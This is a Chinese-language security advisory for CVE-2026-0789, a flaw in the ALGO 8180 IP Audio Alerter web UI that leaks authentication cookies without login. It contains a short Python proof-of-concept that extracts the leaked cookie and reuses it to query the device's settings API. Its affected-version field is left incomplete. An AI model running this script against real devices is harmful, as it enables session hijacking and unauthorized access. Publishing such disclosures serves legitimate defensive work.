CVE-2026-0789 CVSS 7.5 高危

CVE-2026-0789: ALGO 8180 IP Audio Alerter Web UI认证Cookie信息泄露漏洞

披露日期: 2026-01-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-0789

漏洞类型

信息泄露

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ALGO 8180 IP Audio Alerter

漏洞概述

这是ALGO 8180 IP Audio Alerter设备Web UI中的一个信息泄露漏洞。漏洞源于敏感信息管理不当，导致认证Cookie被包含在响应体中。远程攻击者无需认证即可利用此漏洞，窃取设备敏感信息，包括认证Cookie等会话标识符。通过获取有效的认证Cookie，攻击者可以在设备上执行未授权操作，可能导致进一步的安全风险。该漏洞的CVSS评分为7.5，属于高危级别，对设备的机密性造成严重影响。

技术细节

漏洞位于ALGO 8180 IP Audio Alerter的Web界面中，具体问题在于认证Cookie被错误地包含在HTTP响应体中。正常情况下，Cookie应该通过Set-Cookie头发送，而不是在响应体中暴露。攻击者可以通过向目标设备的Web服务发送特定请求，触发响应体中包含认证Cookie的情况。获取Cookie后，攻击者可以利用该Cookie伪装成合法用户进行进一步攻击。由于漏洞无需认证即可利用，远程攻击者可以直接通过网络访问Web UI来触发此漏洞。

攻击链分析

STEP 1

攻击者发送HTTP请求到ALGO 8180设备的Web UI端点

STEP 2

设备返回包含认证Cookie的响应体

STEP 3

攻击者从响应中提取泄露的认证Cookie

STEP 4

使用泄露的Cookie发送后续请求

STEP 5

获取敏感设备信息或执行未授权操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import re

target = 'http://target-ip:8080'

# 触发漏洞获取Cookie
response = requests.get(f'{target}/webui/')

# 从响应体中提取Cookie
cookie_match = re.search(r'auth_cookie=([^&"]+)', response.text)
if cookie_match:
    auth_cookie = cookie_match.group(1)
    print(f'Leaked Auth Cookie: {auth_cookie}')
    
    # 使用泄露的Cookie进行后续操作
    headers = {'Cookie': f'auth_cookie={auth_cookie}'}
    sensitive = requests.get(f'{target}/api/settings', headers=headers)
    print(sensitive.json())

影响范围

ALGO 8180 IP Audio Alerter < 固件版本

防御指南

临时缓解措施

限制Web UI的访问权限，使用网络分段和访问控制列表

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-0789
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-0789
3 Details https://www.cvedetails.com/cve/CVE-2026-0789/
4 VulDB https://vuldb.com/cve/CVE-2026-0789
5 Link https://www.zerodayinitiative.com/advisories/ZDI-26-011/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表